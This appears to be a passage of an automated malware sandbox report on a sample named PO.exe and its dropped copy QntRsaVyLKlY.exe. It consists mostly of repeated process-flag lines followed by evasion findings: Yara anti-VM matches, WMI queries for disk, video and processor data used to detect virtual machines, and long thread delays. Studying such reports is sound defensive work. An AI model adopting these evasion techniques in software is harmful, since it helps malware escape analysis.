Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\QntRsaVyLKlY.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\QntRsaVyLKlY.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\QntRsaVyLKlY.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\QntRsaVyLKlY.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\QntRsaVyLKlY.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\QntRsaVyLKlY.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\QntRsaVyLKlY.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\QntRsaVyLKlY.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\QntRsaVyLKlY.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\QntRsaVyLKlY.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\QntRsaVyLKlY.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\QntRsaVyLKlY.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\QntRsaVyLKlY.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\QntRsaVyLKlY.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\QntRsaVyLKlY.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\QntRsaVyLKlY.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\QntRsaVyLKlY.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\QntRsaVyLKlY.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\QntRsaVyLKlY.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\QntRsaVyLKlY.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\QntRsaVyLKlY.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\QntRsaVyLKlY.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\QntRsaVyLKlY.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\QntRsaVyLKlY.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\QntRsaVyLKlY.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\QntRsaVyLKlY.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\QntRsaVyLKlY.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\QntRsaVyLKlY.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\QntRsaVyLKlY.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\QntRsaVyLKlY.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\QntRsaVyLKlY.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\QntRsaVyLKlY.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\QntRsaVyLKlY.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\QntRsaVyLKlY.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\QntRsaVyLKlY.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\QntRsaVyLKlY.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\QntRsaVyLKlY.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\QntRsaVyLKlY.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\QntRsaVyLKlY.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\QntRsaVyLKlY.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\QntRsaVyLKlY.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\QntRsaVyLKlY.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\QntRsaVyLKlY.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\QntRsaVyLKlY.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\QntRsaVyLKlY.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\QntRsaVyLKlY.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\QntRsaVyLKlY.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\QntRsaVyLKlY.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\QntRsaVyLKlY.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\QntRsaVyLKlY.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\QntRsaVyLKlY.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\QntRsaVyLKlY.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\QntRsaVyLKlY.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\QntRsaVyLKlY.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\QntRsaVyLKlY.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\QntRsaVyLKlY.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\QntRsaVyLKlY.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\QntRsaVyLKlY.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\QntRsaVyLKlY.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\QntRsaVyLKlY.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\QntRsaVyLKlY.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\QntRsaVyLKlY.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\QntRsaVyLKlY.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\QntRsaVyLKlY.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\QntRsaVyLKlY.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\QntRsaVyLKlY.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\QntRsaVyLKlY.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\QntRsaVyLKlY.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\QntRsaVyLKlY.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\QntRsaVyLKlY.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\QntRsaVyLKlY.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\QntRsaVyLKlY.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\QntRsaVyLKlY.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\QntRsaVyLKlY.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\QntRsaVyLKlY.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\QntRsaVyLKlY.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\QntRsaVyLKlY.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\QntRsaVyLKlY.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\QntRsaVyLKlY.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\QntRsaVyLKlY.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\QntRsaVyLKlY.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\QntRsaVyLKlY.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\QntRsaVyLKlY.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\QntRsaVyLKlY.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\QntRsaVyLKlY.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\QntRsaVyLKlY.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\QntRsaVyLKlY.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\QntRsaVyLKlY.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\QntRsaVyLKlY.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\QntRsaVyLKlY.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\QntRsaVyLKlY.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\QntRsaVyLKlY.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\QntRsaVyLKlY.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\QntRsaVyLKlY.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\QntRsaVyLKlY.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\QntRsaVyLKlY.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\QntRsaVyLKlY.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\QntRsaVyLKlY.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\QntRsaVyLKlY.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\QntRsaVyLKlY.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\QntRsaVyLKlY.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\QntRsaVyLKlY.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\QntRsaVyLKlY.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\QntRsaVyLKlY.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\QntRsaVyLKlY.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\QntRsaVyLKlY.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\QntRsaVyLKlY.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\QntRsaVyLKlY.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\QntRsaVyLKlY.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\QntRsaVyLKlY.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\QntRsaVyLKlY.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\QntRsaVyLKlY.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\QntRsaVyLKlY.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\QntRsaVyLKlY.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\QntRsaVyLKlY.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\QntRsaVyLKlY.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\QntRsaVyLKlY.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\QntRsaVyLKlY.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\QntRsaVyLKlY.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\QntRsaVyLKlY.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\QntRsaVyLKlY.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\QntRsaVyLKlY.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\QntRsaVyLKlY.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\QntRsaVyLKlY.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\QntRsaVyLKlY.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\QntRsaVyLKlY.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\QntRsaVyLKlY.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\QntRsaVyLKlY.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Yara detected AntiVM3

Source: Yara match	File source: Process Memory Space: PO.exe PID: 7400, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: QntRsaVyLKlY.exe PID: 8024, type: MEMORYSTR

Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)

Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_DiskDrive
Source: C:\Users\user\AppData\Roaming\QntRsaVyLKlY.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_DiskDrive

Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)

Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
Source: C:\Users\user\AppData\Roaming\QntRsaVyLKlY.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController

Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	Memory allocated: 16F0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	Memory allocated: 30A0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	Memory allocated: 50A0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	Memory allocated: 7CB0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	Memory allocated: 8CB0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	Memory allocated: 8E50000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	Memory allocated: 9E50000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	Memory allocated: 14B0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	Memory allocated: 30C0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	Memory allocated: 50C0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\QntRsaVyLKlY.exe	Memory allocated: 1030000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\QntRsaVyLKlY.exe	Memory allocated: 29B0000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\QntRsaVyLKlY.exe	Memory allocated: 49B0000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\QntRsaVyLKlY.exe	Memory allocated: 6EF0000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\QntRsaVyLKlY.exe	Memory allocated: 7EF0000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\QntRsaVyLKlY.exe	Memory allocated: 6EF0000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\QntRsaVyLKlY.exe	Memory allocated: 2DD0000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\QntRsaVyLKlY.exe	Memory allocated: 2FF0000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\QntRsaVyLKlY.exe	Memory allocated: 4FF0000 memory reserve \| memory write watch

Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Roaming\QntRsaVyLKlY.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\QntRsaVyLKlY.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\QntRsaVyLKlY.exe	Thread delayed: delay time: 922337203685477

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 5101	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 449	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 4897	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 552	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	Window / User API: threadDelayed 1857	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	Window / User API: threadDelayed 4655	Jump to behavior
Source: C:\Users\user\AppData\Roaming\QntRsaVyLKlY.exe	Window / User API: threadDelayed 2137
Source: C:\Users\user\AppData\Roaming\QntRsaVyLKlY.exe	Window / User API: threadDelayed 5262

Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe TID: 7436	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7936	Thread sleep time: -4611686018427385s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7836	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7972	Thread sleep time: -4611686018427385s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7892	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe TID: 5792	Thread sleep time: -20291418481080494s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe TID: 8008	Thread sleep time: -30000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe TID: 7968	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\QntRsaVyLKlY.exe TID: 8148	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Roaming\QntRsaVyLKlY.exe TID: 7840	Thread sleep time: -20291418481080494s >= -30000s
Source: C:\Users\user\AppData\Roaming\QntRsaVyLKlY.exe TID: 7848	Thread sleep time: -30000s >= -30000s
Source: C:\Users\user\AppData\Roaming\QntRsaVyLKlY.exe TID: 5952	Thread sleep time: -922337203685477s >= -30000s

Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Roaming\QntRsaVyLKlY.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Source: C:\Users\user\Desktop\owKQ0b029a.exe

File Volume queried: C:\ FullSizeInformation

Jump to behavior

